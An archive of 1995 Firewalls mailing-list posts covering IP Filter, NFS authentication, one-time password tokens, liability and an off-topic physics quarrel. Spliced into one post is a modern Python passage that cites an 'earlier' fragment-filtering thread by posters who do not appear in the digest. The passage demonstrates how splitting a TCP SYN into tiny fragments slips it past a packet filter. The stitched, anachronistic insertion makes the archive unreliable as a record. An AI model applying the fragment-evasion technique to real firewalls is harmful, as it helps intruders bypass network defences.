To: fc@all.net
Subject: Re: impossible vs. impractical
Cc: firewalls@greatcircle.com
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

From owner-bugtraq@fc.net Tue May 9 17:55:24 1995
Received: from sprawl.fc.net by delta.eecs.nwu.edu (8.6.12/8.6.12) with ESMTP id RAA25223 for ; Tue, 9 May 1995 17:55:21 -0500
Received: from freeside.fc.net (freeside.fc.net [198.6.198.2]) by sprawl.fc.net (8.6.10/8.6.10) with ESMTP id FAA15664 for ; Mon, 8 May 1995 05:46:25 -0500
Received: (from majordom@localhost) by freeside.fc.net (8.6.8.1/8.6.6) id FAA24207 for bugtraq-outgoing; Mon, 8 May 1995 05:48:27 -0500
Received: from all.net (all.net [204.7.229.1]) by freeside.fc.net (8.6.10/8.6.6) with SMTP id FAA24195 for ; Mon, 8 May 1995 05:48:20 -0500
From: fc@all.net (Dr. Frederick B. Cohen)
Received: by all.net (4.1/3.2.012693-Management Analytics); id AA07209 for bugtraq@fc.net; Mon, 8 May 95 06:42:48 EDT
Message-Id: <9505081042.AA07209@all.net>
Subject: Re: impossible vs. impractical
To: mcn@EnGarde.com (Mike Neuman)
Date: Mon, 8 May 1995 06:42:47 -0400 (EDT)
Cc: bugtraq@fc.net
In-Reply-To: <199505080429.XAA13309@guardian.EnGarde.com> from "Mike Neuman" at May 7, 95 11:29:15 pm
X-Mailer: ELM [version 2.4 PL22]
Content-Type: text
Content-Length: 946
Sender: owner-bugtraq@fc.net
Precedence: bulk
Status: R

> Oh good. I think possibility has practicality implied. After all, if you
> can generate an infinite amount of energy, you CAN go the speed of light
> (according to the current laws of physics), so there, it's not impossible.

But according to current physics, there is a finite amount of total energy in the Universe, and thus it is impossible to get the infinite energy required to do this - again, impossible, not infeasible.

WRONG! The 'total energy in the universe is finite' is an UNPROVEN assumption. I'll grant 'consistent with the currently-held *theories*', but that's all. Those 'theories' are just that, however, THEORIES, and by their very nature *un-provable* in a formal sense. They are accepted *only* because no one has _yet_ come up with a 'dis-proof by counter-example'.

From firewalls-owner Wed May 10 09:30:15 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA20109 for firewalls-outgoing; Wed, 10 May 1995 08:26:51 -0700
Received: from cheops.anu.edu.au (cheops.anu.edu.au [150.203.76.24]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id IAA20097 for ; Wed, 10 May 1995 08:26:47 -0700
Message-Id: <199505101526.IAA20097@miles.greatcircle.com>
Received: by cheops.anu.edu.au (1.37.109.16/16.2) id AA020069742; Thu, 11 May 1995 01:29:02 +1000
From: Darren Reed
Subject: IP Filter 2.6
To: firewalls@greatcircle.com
Date: Thu, 11 May 1995 01:29:02 +1000 (EST)
X-Mailer: ELM [version 2.4 PL23]
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Content-Length: 743
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

I've just finished work on version 2.6 of my IP filter and I'm almost 100% happy with fragment handling - although it hasn't really changed since 2.5. For more details, see:

http://cheops.anu.edu.au/~avalon/ip-filter.html
ftp://coombs.anu.edu.au/pub/net/kernel/ip_fil2.6.tar.gz

(Please add this to the lists currently circulating).

To any 'newcomers', this is an IP Filtering package which can be used to help build a firewall and runs on SunOS 4.1.x, NetBSD and (?) FreeBSD/BSDI.

...the % that isn't happy with fragment handling is that depending on the reassembly implementation, it may or may not be safe to filter on "established" (or any other) bits in the TCP header, regardless of whether they are present or not.
Cheers,
Darren

From firewalls-owner Wed May 10 09:47:35 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA21222 for firewalls-outgoing; Wed, 10 May 1995 09:21:19 -0700
Received: from aguila.dpi.udec.cl (aguila.dpi.UDEC.CL [152.74.16.12]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id JAA21217 for ; Wed, 10 May 1995 09:21:14 -0700
Received: from [152.74.18.100] by aguila.dpi.udec.cl (AIX 3.2/UCB 5.64/4.03) id AA26808; Wed, 10 May 1995 12:23:05 -0600
Received: by ing.udec.cl (5.x/SMI-SVR4) id AA05996; Wed, 10 May 1995 12:18:58 -0400
From: claudio@ing.udec.cl (Claudio Baeza R.)
Message-Id: <9505101618.AA05996@ing.udec.cl>
Subject: share -F nfs -o secure doesn't work...
To: firewalls@greatcircle.com
Date: Wed, 10 May 1995 12:18:56 -0400 (CST)
Cc: webmaster@sun.com
X-Mailer: ELM [version 2.4 PL23]
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Hi

When I try to share a directory with the secure option, it doesn't work.

root-server1>share -F nfs -o secure /dir

root-client1>mount -F nfs server1:/dir /dir
NFS getattr failed for server canelo: RPC: Authentication error
nfs mount: mount: /dir: I/O error

root-client2>mount -F nfs -o secure server1:/dir /dir
NOTICE: authdes_refresh: unable to synchrize with server
NOTICE: authdes_refresh: unable to encrypt conversation key
WARNING: authget: authdes_create failed: Invalid argument
WARNING: clget: authget failed (scanning chtable): Invalid argument
nfs mount: mount: /dir: Invalid argument

Notice:
1.- I am using NIS+ and Solaris 2.4, rpc.nisd running with default option (DES=2 , -Y).
2.- The archive nsswitch.conf is the following:

#
# /etc/nsswitch.nisplus:
#
# An example file that could be copied over to /etc/nsswitch.conf; it
# uses NIS+ (NIS Version 3) in conjunction with files.
#
# "hosts:" and "services:" in this file are used only if the
# /etc/netconfig file has a "-" for nametoaddr_libs of "inet" transports.

# the following two lines obviate the "+" entry in /etc/passwd and /etc/group.
passwd:     files nisplus
group:      files nisplus

# consult /etc "files" only if nisplus is down.
#hosts:     nisplus [NOTFOUND=return] files
#Uncomment the following line, and comment out the above, to use both DNS
#and NIS+. You must also set up the /etc/resolv.conf file for DNS name
#server lookup. See resolv.conf(4).
hosts:      files nisplus dns [NOTFOUND=return]

services:   nisplus files [NOTFOUND=return]
networks:   nisplus files [NOTFOUND=return]
protocols:  nisplus files [NOTFOUND=return]
rpc:        nisplus files [NOTFOUND=return]
ethers:     nisplus files [NOTFOUND=return]
netmasks:   nisplus files [NOTFOUND=return]
bootparams: files nisplus
publickey:  nisplus
netgroup:   nisplus
automount:  files nisplus
aliases:    files nisplus
sendmailvars: files nisplus

If someone knows a solution please send mail to claudio@ing.udec.cl

Thanks in advance

atte
Claudio...

From firewalls-owner Wed May 10 10:31:34 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA20423 for firewalls-outgoing; Wed, 10 May 1995 08:43:40 -0700
Received: from uvs1.orl.mmc.com (uvs1.orl.mmc.com [141.240.192.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id IAA20412 for ; Wed, 10 May 1995 08:43:35 -0700
Received: from TCCSLR.DECnet MAIL11D_V3 by uvs1.orl.mmc.com (5.57/Ultrix3.0-C) id AA22058; Wed, 10 May 95 11:37:43 -0400
Date: Wed, 10 May 95 11:37:42 -0400
Message-Id: <9505101537.AA22058@uvs1.orl.mmc.com>
From: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security)
To: "bdboyle@erenj.com"@UVS1.dnet.mmc.com
Cc: "firewalls@greatcircle.com"@UVS1.dnet.mmc.com
Subject: Liable for security
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

>I would posit that the CIO of a company at some level of "largeness" would be
>relatively clueless about the *precise* risks, exposures, etc. of his/her/its
>organization.

Agree but this becomes less of a defense when the Internet security issue is on the front cover of a management oriented magazine like Information Week (12 Dec. 1994) or even Newsweek (Feb. 27, 1995). To be clueless, (s)he would have to be illiterate.

P.fla

From firewalls-owner Wed May 10 11:22:21 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA20975 for firewalls-outgoing; Wed, 10 May 1995 09:14:07 -0700
Received: from raksha.atlanta.com (raksha.atlanta.com [155.229.1.5]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id JAA20969 for ; Wed, 10 May 1995 09:14:02 -0700
Received: from mjsus.atlanta.com (mjsus.atlanta.com [155.229.129.103]) by raksha.atlanta.com (8.6.9/8.6.9) with SMTP id MAA05071 for ; Wed, 10 May 1995 12:16:22 -0400
Message-Id: <199505101616.MAA05071@raksha.atlanta.com>
X-Sender: mjsus@pop.atlanta.com
X-Mailer: Windows Eudora Version 1.4.3
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Date: Wed, 10 May 1995 11:12:38 -0400
To: firewalls@greatcircle.com
From: mjsus@atlanta.com (Markku Saarelainen)
Subject: Real Case: 0.01 % probability
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

All electronic firewalls are necessary and important, but so are the physical firewalls as a part of an overall Information Security System.
The information security incidents may also happen by accident as the following case example describes:

--------------------------------------------------------------------------------

A real case example:

This is the real case and it happened in a small size business organization a couple of weeks ago. The estimated probability of this incident happening was 0.01 %. The result of this incident was that 5 % of the most important business information was deleted causing 100 hours of extra work and the unnecessary business interruption.

The Business Analyst and Developer was adhering to the Information Security Program as described in the Information Security System Manual. This program establishes basic elements for the information backup, information access protection, activity logs and any other information security related matters. The Information Security System was to ensure that no unauthorized access was possible and the information was protected. However, as the "Murphy's Law" says "what can happen, it will happen" as it happened.

The Business Analyst left for a 20 minute break and did not turn the computer off and left the most important files open in the database program. This person had never before left these files open and has always turned off the computer when he has left his work. However, for one reason or another, he did not do this at this time - and then things started happening !!!!!

The computer's electricity was connected to the switch that can be turned off and on by the person in the Business Analyst's office room. This switch shall also turn off the lights in the room. During the 20 minute break, somebody had entered into the Business Analyst's room and turned off the switch, which, of course, then turned off the computer (closing all files that were open in the computer) and the room lights.

After the 20 minute break (the 20-minute time window) the Business Analyst returned back to the room and found out that all electricity was off and the computer was also turned off. Quickly, the Business Analyst turned on all electricity and the computer and started checking the system for any potential and actual damages. And soon the person identified that the most important file (that was left open) was actually corrupted and 20 % of the important information was gone (the estimation - a 2 months effective work). The Business Analyst had turned off the computer several times before, when the same files have been open, and the files have never become corrupted. This case was different. Fortunately, 75 % of the damaged and deleted data were backed up and recoverable, and the total damage was only the 5 % loss of the important information.

Was this damage caused by somebody deliberately? After careful analysis, the only possible answer is "NO". The incident happened purely by accident and was caused by many small, but very meaningful, coincidences that happened perfectly at the same time - coincidentally and unfortunately. And the main cause of this particular incident was a pure human error / mistake. However, the incident caused the company to analyze its "bullet proof" Information Security System again and to reengineer this system to prevent any similar damages happening again in the future.

--------------------------------------------------------------------------------

As this example shows the structured and organized Information Security System can prevent potential damages in an overall information system, and without the Information Security System the probability of these damages happening is much higher.

*****************************************************************
Markku J. Saarelainen               Tel: U.S.A-(404)-998-7855
P.O.Box 1672                        FAX: U.S.A-(404)-998-7855
Roswell, GA 30077, USA              Email: mjsus@atlanta.com

DISCLAIMER
No thought written in this message is a statement of any organization by which I am employed or for which I work.
*****************************************************************

From firewalls-owner Wed May 10 12:21:41 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA25956 for firewalls-outgoing; Wed, 10 May 1995 12:03:58 -0700
Received: from riverside.mr.net (Riverside.MR.Net [137.192.2.5]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id MAA25944 for ; Wed, 10 May 1995 12:03:52 -0700
Received: from mail.carlson.com by riverside.mr.net (8.6.12/SMI-4.1.R931202) id OAA22611; Wed, 10 May 1995 14:04:21 -0500
Received: by mail.carlson.com with Microsoft Mail id <2FB12A38@mail.carlson.com>; Wed, 10 May 95 14:03:52 PDT
From: "Anderson, Jeremy"
To: firewalls
Subject: Re: impossible vs. impractical
Date: Wed, 10 May 95 13:58:00 PDT
Message-ID: <2FB12A38@mail.carlson.com>
Encoding: 70 TEXT
X-Mailer: Microsoft Mail V3.0
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

For Pete's SAKE! Can we TRY to keep the conversation at least TANGENTIALLY related to firewalls? I'm trying to learn about this stuff, and it seems that about 85% of the people with anything to do with firewalls have nothing better to do than _mindlessly_ debate silly little points. Signal to noise ratio is WAY low, thanks to mindless quibbling like this! And do we have to cc: to firewalls? Are you that sure we're interested in it? Flame me all you like, but do it to my PRIVATE email.

Btw, do we have to quote FULL message headers?

----------
From: firewalls-owner
To: fc
Cc: firewalls
Subject: Re: impossible vs. impractical
Date: Wednesday, May 10, 1995 1:02AM

[Header deleted]

> Oh good. I think possibility has practicality implied. After all, if you
> can generate an infinite amount of energy, you CAN go the speed of light
> (according to the current laws of physics), so there, it's not impossible.

But according to current physics, there is a finite amount of total energy in the Universe, and thus it is impossible to get the infinite energy required to do this - again, impossible, not infeasible.

WRONG! The 'total energy in the universe is finite' is an UNPROVEN assumption. I'll grant 'consistent with the currently-held *theories*', but that's all. Those 'theories' are just that, however, THEORIES, and by their very nature *un-provable* in a formal sense. They are accepted *only* because no one has _yet_ come up with a 'dis-proof by counter-example'.
__________________

"So there!" This is very appropriate for a discussion which is beginning to sound like a playground brawl.

btw, not everyone is using a unix-based mailer. Much against my will, I'm using MSMail, which only shows the sender as 'Firewalls-owner.' PLEASE put a sig or some type of identification after your letter! If you don't, some of us may have no idea who/what/where you are! ;)

Obligatory Firewall Reference: Does anyone know of firewalls to run under A/UX?

Jeremy Anderson
VRU Analyst/Defacto Unix Admin
u02iv34@cci.nwhq1.carlson.com
HIGHLY PROFANE and NASTY flames to: obrenov@winternet.com (my personal account)
---I am in NO way a representative of Carlson Companies. Anything I say is completely and totally coincidental. If, at any time, you begin to think that I represent CCI, please remember--you are wrong.
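Returning to the IP fragment filtering thread earlier in this digest (Danny Boulet, Darren Reed and Andrew Molitor), here is an added worked example; it is not code from any poster, nor from the ipfirewall or IP Filter packages. It builds a constructed TCP SYN to port 25, splits it so that the port numbers land in the head fragment and the TCP flags only in the tail, and evaluates the two policies the thread describes: Molitor's "a predicate that needs absent data is false" and Boulet's "drop a head fragment too short to evaluate the rule". The packet builder, the field helpers, the blocked port and the verdict function names are my own assumptions for the demonstration.

```python
import struct

IP_HDR_LEN = 20          # minimal IPv4 header, no options
IPPROTO_TCP = 6
TCP_SYN, TCP_ACK = 0x02, 0x10
IP_MF = 0x2000           # "more fragments" bit of the IPv4 flags/offset field

def build_ipv4_tcp(sport, dport, tcp_flags, payload=b""):
    """Constructed test packet: minimal IPv4 + TCP headers, checksums left at zero
    (the filters below never look at them)."""
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 1, 0, 5 << 4, tcp_flags, 8192, 0, 0)
    tcp += payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, IP_HDR_LEN + len(tcp), 1, 0, 64,
                     IPPROTO_TCP, 0, bytes([10, 0, 0, 1]), bytes([10, 0, 0, 2]))
    return ip + tcp

def fragment(packet, cut):
    """Split the transport part of an unfragmented packet into a head and a tail
    fragment at transport byte `cut` (IPv4 fragment offsets are in 8-byte units)."""
    if cut % 8 or not 0 < cut < len(packet) - IP_HDR_LEN:
        raise ValueError("cut must be a multiple of 8 inside the transport data")
    hdr, data = packet[:IP_HDR_LEN], packet[IP_HDR_LEN:]
    frags = []
    for start, end, more in ((0, cut, IP_MF), (cut, len(data), 0)):
        h = bytearray(hdr)
        struct.pack_into("!H", h, 2, IP_HDR_LEN + (end - start))   # total length
        struct.pack_into("!H", h, 6, more | (start // 8))          # flags + offset
        frags.append(bytes(h) + data[start:end])
    return frags

def parse(frag):
    """Decode the fields a fragment-aware filter needs from one IPv4 fragment."""
    ihl = (frag[0] & 0x0F) * 4
    total, flags_off = struct.unpack_from("!HxxH", frag, 2)
    return {"proto": frag[9], "offset": (flags_off & 0x1FFF) * 8,
            "mf": bool(flags_off & IP_MF), "data": frag[ihl:total]}

def transport_byte(info, n):
    """Byte n of the transport header if this fragment carries it, else None."""
    rel = n - info["offset"]
    return info["data"][rel] if 0 <= rel < len(info["data"]) else None

# Rule under discussion: drop TCP connection requests (SYN set, ACK clear) to BLOCKED_PORT.
# It needs transport bytes 2-3 (destination port) and byte 13 (TCP flags).
BLOCKED_PORT = 25        # assumed value for the demonstration
RULE_NEEDS_BYTES = 14

def rule_matches(info):
    """Molitor-style evaluation: a predicate that needs data absent from this
    fragment is simply false, so the rule does not match."""
    if info["proto"] != IPPROTO_TCP:
        return False
    hi, lo, flags = (transport_byte(info, n) for n in (2, 3, 13))
    if hi is None or lo is None or flags is None:
        return False
    return (hi << 8 | lo) == BLOCKED_PORT and bool(flags & TCP_SYN) and not (flags & TCP_ACK)

def molitor_verdict(frag):
    return "drop" if rule_matches(parse(frag)) else "pass"

def boulet_verdict(frag):
    """As Boulet describes ipfirewall 2.0: a head fragment too short to evaluate
    the rule is dropped (so the destination can never reassemble the datagram);
    tail fragments are not matched against port/flag rules at all."""
    info = parse(frag)
    if info["proto"] != IPPROTO_TCP or info["offset"] != 0:
        return "pass"
    if info["mf"] and len(info["data"]) < RULE_NEEDS_BYTES:
        return "drop"
    return "drop" if rule_matches(info) else "pass"

def verdicts(frags, policy):
    return [policy(f) for f in frags]

if __name__ == "__main__":
    syn = build_ipv4_tcp(40000, BLOCKED_PORT, TCP_SYN)
    split = fragment(syn, 8)   # ports in the head fragment, flags only in the tail
    print("unfragmented:", verdicts([syn], molitor_verdict), verdicts([syn], boulet_verdict))
    print("split at 8:  ", verdicts(split, molitor_verdict), verdicts(split, boulet_verdict))
```

Run stand-alone, the unfragmented SYN is dropped under both policies, but with the split at byte 8 the Molitor-style filter passes both fragments (the head lacks the flags, the tail lacks the ports), which is exactly Boulet's objection, while the Boulet-style filter drops the 8-byte head. The thread's two caveats still apply to the second policy: tail fragments are passed unexamined, so they can be used to flood the destination's reassembly buffers, and as Reed notes, whether filtering on TCP header bits is safe at all also depends on how the destination's reassembly code treats fragments that overlap.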
From firewalls-owner Wed May 10 13:08:14 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA26628 for firewalls-outgoing; Wed, 10 May 1995 12:38:05 -0700
Received: from northshore.ecosoft.com (northshore.ecosoft.com [192.233.85.129]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id MAA26623 for ; Wed, 10 May 1995 12:37:59 -0700
Received: from [198.115.177.204] (slip-0-4.shore.net) by northshore.ecosoft.com with SMTP id AA21468 (5.67a/IDA-1.5 for ); Wed, 10 May 1995 15:38:17 -0400
Message-Id: <199505101938.AA21468@northshore.ecosoft.com>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Date: Tue, 9 May 1995 14:43:19 -0500
To: firewalls@greatcircle.com
From: vin@shore.net (Vin McLellan)
Subject: One Time Password Tokens
Cc: stewsg@delphi.com
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

The Estimable Padgett opined:

>The time synchronous are the easiest to use, just read off a
>number and type it in plus a PIN, the biggest problem being
>drift and a "window of operation" that could be exploited.
>Challenge/response are a bit more cumbersome to use - has a
>calculator-like keypad, you enter a PIN+challenge, push a
>button, and then type in the response.

I don't know about RPG and ActivCard, but time/secret-key tokens based on Weiss' patents (SecurIDs) don't have a big (security) problem with either drift or the "window of vulnerability." That's a lot of marketing fluff. (The cost of two-factor tokens remains the real limitation on widespread use of tokens.)

* Drift: Weiss' core patents address the dynamic synchronization of the clocks in the authentication server and a specific card. With the server clock assumed as accurate, the SecurID server keeps a record of the apparent drift of every card. A user's PIN+Card-code message must match that expected at the server -- or be off by only one "time-unit" (30 sec. or 1 min) fore or aft.
* Window: For a single server, the SecurID record is locked with the initial contact. For the fraction of card-holders registered on multiple servers, SDI has always sold a 3-seed card that allows a single PIN to be used on all three servers, since -- clicking the card -- each card-code sequence will be unique to that server. Alternatively, different PINs can be used (each for a different server) with a single card. In short, few leave a window open -- none have to.

* Extended Drift: When a card is not used for an extended period, the drift of the card-clock can wander more than one time-slot (slower or faster) from what the server expects -- even when the server has a record of the card's previous drift. In that case, the server extends the window, successively, to five, seven, nine, twelve time-slots, trying to match the SecurID code, adjusted for time drift. When it finds a match, it then demands the next successive card-code to validate the access request.

Within client/server milieu, these defenses are buttressed by additional security within the SecurID call packet created by the client, which includes an encrypted IP address. A packet captured or spoofed and re-transmitted from another IP address would be denied and would set off alarms.

>Recently two companies using challenge-response technology
>(Enigma-Logic and Secure Computing) have introduced the
>next logical step, software based tokens. In each, software is
>running in the background on the user's computer that
>recognizes when a challenge is received and pops up a window
>for the user to enter her/his/etc. PIN. The process is then
>handled entirely in the background.

>As a result the PC becomes the token and no external hardware
>is necessary. Further the cost is tied to software on the host
>computer, token cost for the individual users can become zero
>(and has in one case).

(PS. Digital Pathways also has a soft token.)
No one can argue with the attractive economics of the "soft token;" but S/key economics are even better, aren't they? Both are light-years more secure than the naked norm... but are they two-factor authenticators?

There were statistics circulating, years back, that documented an enormous difference between the security of one-factor authentication (something known) and two factor (something known, something held, or something inherent in the person: a biometric) IDs. Since then, the marketing guys always stretch an argument to claim 2-factor ID authentication.

A classicist would debate Padgett's reference to the PC as an ID token. Traditional usage defines a token as something "personal, tangible, and uncounterfeitable." A software product is seldom hard to copy, whatever its defenses. Also, existing "soft tokens" seem to hold both the C/R secret key and the (hashed) PIN in software, making it a much more attractive target for an attacker. The user uses his PIN to get access to the secret key, which in turn is used to encrypt a challenge from the server. In most challenge/response protocols (Enigma's, e.g.) the encrypted response to the challenge is assumed to be evidence that the PIN was correct -- but the server does not independently validate a user PIN. In fact, it never sees it.

The "soft token" -- a great product, which I'd like to see all over -- is a single-factor (something you have) dynamic authenticator. The integrity of this access control system depends upon the physical security of the PCs, which hold in software everything needed to access the system.

>The problem with incorporating such a scheme to a time
>synchronous operation is that the clock drift on a PC is
>notoriously bad.

This is a non-issue. The drift of a PC clock is manageable. The real issues that constrain SDI and others from issuing a soft token -- IMHO -- are strategic, competitive, and economic...
maybe even ideological;-)

>Point is that PIN + PC keeps the two factor authentication
>deemed sufficient (something you know - PIN - and something
>you have - PC/software). True, software can be copied but there
>should be ways around that limitation and the benefits would
>be IMNSHO well worth the additional risk. Besides you can
>still have token cards for those "in harm's way", this just lets
>everyone have them.

I agree with your risk/benefit analysis. Even if soft tokens offer only a dynamic single-factor ID authentication, as I believe, God knows they're badly needed! I'd also argue that real tokens are necessary when risk is more than random, and the assets to be protected are attractive targets for intruders or looters. (I seriously doubt that soft-token client software -- holding all the secrets -- would long withstand a determined attack by a Padgett Peterson or his peer.)

Suerte,
_Vin

--
Vin McLellan    +The Privacy Guild+    USA Tel. (617) 884-5546
Mail: 53 Nichols St., Chelsea, Ma. 02150
''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''

From firewalls-owner Wed May 10 13:09:35 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA27633 for firewalls-outgoing; Wed, 10 May 1995 13:04:15 -0700
Received: from dg-rtp.dg.com (dg-rtp.rtp.dg.com [128.222.1.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id NAA27628 for ; Wed, 10 May 1995 13:04:12 -0700
Received: from wellspring.us.dg.com by dg-rtp.dg.com (5.4R2.01/dg-rtp-v02) id AA11041; Wed, 10 May 1995 16:04:44 -0400
Received: from immis184 by wellspring.us.dg.com (5.4.1/dg-gens08) id AA04618; Wed, 10 May 1995 16:04:41 -0400
Message-Id: <9505102004.AA04618@wellspring.us.dg.com>
Comments: Authenticated sender is
From: "Jim Carroll"
Organization: Data General (Canada) Inc.
To: firewalls@greatcircle.com
Date: Wed, 10 May 1995 16:04:32 -0500
Subject: Re: impossible vs. impractical
Reply-To: jcarroll@wellspring.us.dg.com
Priority: normal
X-Mailer: Pegasus Mail for Windows (v2.0-WB1)
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

What the hell does this have to do with firewalls?

--
Jim Carroll - jcarroll@wellspring.us.dg.com
... the usual disclaimers ...
## Life is like a boxing chocolate ##

From firewalls-owner Wed May 10 13:49:05 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA27516 for firewalls-outgoing; Wed, 10 May 1995 13:00:16 -0700
Received: from inesc.inesc.pt (inesc.inesc.pt [146.193.0.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id NAA27502 for ; Wed, 10 May 1995 13:00:07 -0700
Received: from ccae-sv.inesc.pt by inesc.inesc.pt with SMTP; id AA21350 (/); Wed, 10 May 1995 21:57:29 +0200
Received: from beatle by ccae-sv.inesc.pt (4.1/SunOS4.1.3) id AA08148; Wed, 10 May 95 22:00:30 +0200
Message-Id: <9505102000.AA08148@ccae-sv.inesc.pt>
Comments: Authenticated sender is
From: "Ricardo Jorge Pereira"
Organization: CCAE
To: firewalls@GreatCircle.com
Date: Wed, 10 May 1995 21:16:10 +0000
Subject: xinetd on HP-UX ?
Reply-To: ricardo.pereira@inesc.pt
Priority: normal
X-Mailer: Pegasus Mail for Windows (v2.0-WB3)
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

I know this isn't the best place for this, but I really need an answer for this. Please do not reply to the list, send it to me directly.

Thanks in advance

__________________________________________________________________
Ricardo Jorge Pereira
Network Consultant
Centro de Comunicacoes em Ambientes Empresariais
Av. Duque d'Avila 23, Apartado 10105, 1017 Lisboa Codex, Portugal
Telef : +351 1 3100069    Fax : +351 1 3100068
email : ricardo.pereira@inesc.pt
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Microsoft is not the answer, Microsoft is the question. No is the answer.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From firewalls-owner Wed May 10 14:06:54 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA26811 for firewalls-outgoing; Wed, 10 May 1995 12:43:39 -0700
Received: from nps.navy.mil (nps.navy.mil [131.120.254.52]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id MAA26806 for ; Wed, 10 May 1995 12:43:35 -0700
Received: from sabik.cc.nps.navy.mil ([131.120.50.159]) by nps.navy.mil (4.1/SMI-4.1) id AA11546; Wed, 10 May 95 12:42:17 PDT
Date: Wed, 10 May 95 12:42:17 PDT
From: mhpham@nps.navy.mil (Michael Pham)
Message-Id: <9505101942.AA11546@nps.navy.mil>
To: Firewalls@GreatCircle.COM
Subject: Re: Firewalls/Filters
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

----- Begin Included Message -----

From Brent@GreatCircle.COM Tue May 9 20:52:17 1995
X-Sender: brent@miles.greatcircle.com
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Date: Tue, 9 May 1995 20:52:37 -0800
To: mhpham@nps.navy.mil (Michael Pham)
From: Brent@GreatCircle.COM (Brent Chapman)
Subject: Re: Firewalls/Filters
Content-Length: 737

At 2:33 PM 5/9/95, Michael Pham wrote:
>Hello Brent,
>
>What Packet filters would deal w/ ATM packet frame authentications!
>
>Thanks -- Michael

I have no idea; I've never worked with ATM. Suggest you ask
Firewalls@GreatCircle.COM.
-Brent

----------------------------------------------------------------------
For info about the Internet Security Firewalls Tutorial and a schedule
of upcoming dates, please send email to Tutorial-Info@GreatCircle.COM
----------------------------------------------------------------------
Brent Chapman                          Great Circle Associates
Brent@GreatCircle.COM                  1057 West Dana Street
+1 415 962 0841                        Mountain View, CA 94041

----- End Included Message -----

From firewalls-owner Wed May 10 14:26:20 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA27542 for firewalls-outgoing; Wed, 10 May 1995 13:00:48 -0700
Received: from npt.nuwc.navy.mil (NPT.NUWC.NAVY.MIL [129.190.70.100]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id NAA27537 for ; Wed, 10 May 1995 13:00:45 -0700
Received: from sun811 by npt.nuwc.navy.mil with SMTP ; Wed, 10 May 95 15:33:27 EDT
Received: by sun811 (5.x/SMI-SVR4) id AA02851; Wed, 10 May 1995 15:32:04 -0400
Date: Wed, 10 May 1995 15:32:04 -0400
From: jhb@sun811.npt.nuwc.navy.mil (John Balch)
Message-Id: <9505101932.AA02851@sun811>
To: firewalls@greatcircle.com
Subject: Liable for Security
X-Sun-Charset: US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> > Ian writes:
> >Therefore a court may take the view that a company which has already
> >considered, or adopted, technology such as a firewall already admits
> >knowledge of all potential risks and has accepted responsibility for
> >preventing them. The result could then be that in two actions which are
> >functionally similar, the company which did not take any risk management
> >actions suffers less than the company which spent a fortune on risk
> >reduction technology that did not prevent the incident.
>
> Still not allowed to have an opinion but would seem that if the sewer could
> show that the sooie (or some responsible individual) did know of the risks
> (and subscription to the FIREWALLs list might be an indication) then the
> effect would be reversed. "Shoulda knowed" is the "culpable" part.
>
> Does sound like high comedy though. Can see the solicitor advising a client:
> "Now here we need to prove that you, the CIO of a successful multi-billion
> dollar company, are an idiot."
>
> Warmly,
> Padgett
>

Many people in high places are willing (even eager) to look like idiots if
they can evade fines and/or jail time. It started with the man Gore Vidal
used to call "Acting President Reagan" and runs in a very crooked line down
to the former Treasurer of Orange County.

(Not strictly firewall stuff, but I couldn't resist.)

John Balch
GPS Technologies, Inc.
25 Enterprise Center
Middletown RI 02842

From firewalls-owner Wed May 10 14:44:40 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA29584 for firewalls-outgoing; Wed, 10 May 1995 13:52:09 -0700
